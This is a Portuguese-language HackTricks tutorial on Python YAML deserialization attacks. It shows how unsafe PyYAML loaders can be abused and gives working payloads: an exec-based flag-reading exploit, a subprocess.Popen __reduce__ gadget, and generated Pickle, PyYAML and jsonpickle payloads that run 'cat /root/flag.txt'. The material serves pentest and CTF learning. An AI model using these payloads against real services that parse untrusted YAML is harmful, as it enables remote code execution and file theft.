# Python Yaml Deserialization {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## Yaml **Deserialization** **Yaml** bibliotecas python também são capazes de **serializar objetos python** e não apenas dados brutos: ``` print(yaml.dump(str("lol"))) lol ... print(yaml.dump(tuple("lol"))) !!python/tuple - l - o - l print(yaml.dump(range(1,10))) !!python/object/apply:builtins.range - 1 - 10 - 1 ``` Verifique como a **tupla** não é um tipo de dado bruto e, portanto, foi **serializada**. E o mesmo aconteceu com o **range** (retirado dos builtins). ![](<../../.gitbook/assets/image (1040).png>) **safe\_load()** ou **safe\_load\_all()** usa SafeLoader e **não suporta a desserialização de objetos de classe**. Exemplo de desserialização de objeto de classe: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:builtins.range [1, 10, 1]' print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10) print(yaml.load(data, Loader=Loader)) #range(1, 10) print(yaml.load_all(data)) # print(yaml.load_all(data, Loader=Loader)) # print(yaml.load_all(data, Loader=UnsafeLoader)) # print(yaml.load_all(data, Loader=FullLoader)) # print(yaml.unsafe_load(data)) #range(1, 10) print(yaml.full_load_all(data)) # print(yaml.unsafe_load_all(data)) # #The other ways to load data will through an error as they won't even attempt to #deserialize the python object ``` O código anterior usou **unsafe\_load** para carregar a classe python serializada. Isso ocorre porque na **versão >= 5.1**, não permite **desserializar qualquer classe python serializada ou atributo de classe**, com Loader não especificado em load() ou Loader=SafeLoader. ### Exploração Básica Exemplo de como **executar um sleep**: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:time.sleep [2]' print(yaml.load(data, Loader=UnsafeLoader)) #Executed print(yaml.load(data, Loader=Loader)) #Executed print(yaml.load_all(data)) print(yaml.load_all(data, Loader=Loader)) print(yaml.load_all(data, Loader=UnsafeLoader)) print(yaml.load_all(data, Loader=FullLoader)) print(yaml.unsafe_load(data)) #Executed print(yaml.full_load_all(data)) print(yaml.unsafe_load_all(data)) ``` ### Vulnerável .load("\") sem Loader **Versões antigas** do pyyaml eram vulneráveis a ataques de deserialização se você **não especificasse o Loader** ao carregar algo: `yaml.load(data)` Você pode encontrar a [**descrição da vulnerabilidade aqui**](https://hackmd.io/@defund/HJZajCVlP)**.** O **exploit** proposto nessa página é: ```yaml !!python/object/new:str state: !!python/tuple - 'print(getattr(open("flag\x2etxt"), "read")())' - !!python/object/new:Warning state: update: !!python/name:exec ``` Ou você também poderia usar esta **linha única fornecida por @ishaack**: ```yaml !!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]} ``` Note que em **versões recentes** você não pode **mais chamar `.load()`** **sem um `Loader`** e o **`FullLoader`** **não é mais vulnerável** a este ataque. ## RCE Payloads personalizados podem ser criados usando módulos Python YAML como **PyYAML** ou **ruamel.yaml**. Esses payloads podem explorar vulnerabilidades em sistemas que desserializam entradas não confiáveis sem a devida sanitização. ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader import subprocess class Payload(object): def __reduce__(self): return (subprocess.Popen,('ls',)) deserialized_data = yaml.dump(Payload()) # serializing data print(deserialized_data) #!!python/object/apply:subprocess.Popen #- ls print(yaml.load(deserialized_data, Loader=UnsafeLoader)) print(yaml.load(deserialized_data, Loader=Loader)) print(yaml.unsafe_load(deserialized_data)) ``` ### Ferramenta para criar Payloads A ferramenta [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) pode ser usada para gerar payloads de deserialização em python para abusar de **Pickle, PyYAML, jsonpickle e ruamel.yaml:** ```bash python3 peas.py Enter RCE command :cat /root/flag.txt Enter operating system of target [linux/windows] . Default is linux :linux Want to base64 encode payload ? [N/y] : Enter File location and name to save :/tmp/example Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All Done Saving file !!!! cat /tmp/example_jspick {"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]} cat /tmp/example_pick | base64 -w0 gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg== cat /tmp/example_yaml !!python/object/apply:subprocess.Popen - !!python/tuple - cat - /root/flag.txt ``` ### Referências * [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) * [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html) {% hint style="success" %} Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}